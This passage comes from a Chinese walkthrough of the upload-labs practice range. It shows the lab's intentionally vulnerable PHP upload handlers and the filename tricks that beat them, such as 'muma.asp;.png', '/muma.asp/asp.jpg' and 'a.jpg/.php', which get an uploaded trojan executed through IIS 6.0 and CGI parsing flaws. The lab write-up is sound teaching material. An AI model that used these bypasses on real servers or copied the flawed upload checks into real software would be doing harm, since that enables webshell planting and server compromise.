upload-labs通关详细教程_第54张图片

源码分析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $img_path = $UPLOAD_ADDR . '/' .$file_name;
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传失败!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);:输出后缀

move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path):函数把上传的文件 F I L E S 移动到新位置 _FILES移动到新位置 FILES移动到新位置img_path。

20、IIS6.0解析漏洞(一)

做题步骤

抓包,改文件后缀

upload-labs通关详细教程_第55张图片

返回文件位置:
upload-labs通关详细教程_第56张图片

upload-labs通关详细教程_第57张图片

源码分析

$allowedExts = array("gif", "jpeg", "jpg", "png","asa","cer","cdx");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp);     // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800)   // 小于 200 kb
&& in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "错误:: " . $_FILES["file"]["error"] . "";
    }
    else
    {
        echo "上传文件名: " . $_FILES["file"]["name"] . "";
        echo "文件类型: " . $_FILES["file"]["type"] . "";
        echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
      
        if (file_exists("./a/image/" . $_FILES["file"]["name"]))
        {
            echo $_FILES["file"]["name"] . " 文件已经存在。 ";
        }
        else
        {
            // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
            $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
            echo "文件存储在: " . "./a/image/" . $_FILES["file"]["name"];
        }
    }
}
else
{
    echo "非法的文件格式";
}

21、IIS6.0解析漏洞(二)

文件名漏洞:触发漏洞的命名方式:as.asp;.jpg

做题步骤

抓包修改后缀为.asp;.png进行截断

upload-labs通关详细教程_第58张图片

upload-labs通关详细教程_第59张图片

upload-labs通关详细教程_第60张图片

源码分析

$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp);     // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800)   // 小于 200 kb
&& in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "错误:: " . $_FILES["file"]["error"] . "";
    }
    else
    {
        echo "上传文件名: " . $_FILES["file"]["name"] . "";
        echo "文件类型: " . $_FILES["file"]["type"] . "";
        echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
      
        if (file_exists("./b/image/" . $_FILES["file"]["name"]))
        {
            echo $_FILES["file"]["name"] . " 文件已经存在。 ";
        }
        else
        {
            // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
            $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
            echo "文件存储在: " . "./b/image/" . $_FILES["file"]["name"];
	    echo "";
        }
    }
}
else
{
    echo "非法的文件格式";
}

22、IIS6.0解析漏洞(三)

文件夹名漏洞:触发漏洞的命名方式:as.asp;.jpg

做题步骤

抓包修改文件名为:/muma.asp/asp.jpg或者修改为muma.asp;.png
upload-labs通关详细教程_第61张图片

upload-labs通关详细教程_第62张图片

upload-labs通关详细教程_第63张图片

源码分析

$allowedExts = array("jpg");
$time = time();
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp);     // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800)   // 小于 200 kb
&& in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "错误:: " . $_FILES["file"]["error"] . "";
    }
    else
    {
        echo "上传文件名: " . $_FILES["file"]["name"] . "";
        echo "文件类型: " . $_FILES["file"]["type"] . "";
        echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
      
        if (file_exists("C:/Inetpub/wwwroot/c/image/a.asp/" .$time.".jpg"))
        {
            echo $_FILES["file"]["name"] . " 文件已经存在。 ";
        }
        else
        {
            // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
            $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/a.asp/".$time.".jpg");
            echo "文件存储在: " . "./c/image/a.asp/".$time.".jpg";
            echo "";
        }
    }
}
else
{
    echo "非法的文件格式";
}

$allowedExts = array("jpg"); :只允许上传jpg文件

$extension = end($temp); : 获取文件后缀名,使用/截断

23、CGI解析漏洞

触发解析漏洞的命名:a.jpg/.php

做题步骤

直接上传图片马

访问时加上/.php,让他以php形式解析

upload-labs通关详细教程_第64张图片

upload-labs通关详细教程_第65张图片

源码分析

if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $allow_ext = array(".jpg",".jpeg",".png",".bmp",".gif");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传,仅允许[.jpg, .jpeg, .png, .bmp, .gif]!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

你可能感兴趣的:(常见漏洞,web安全)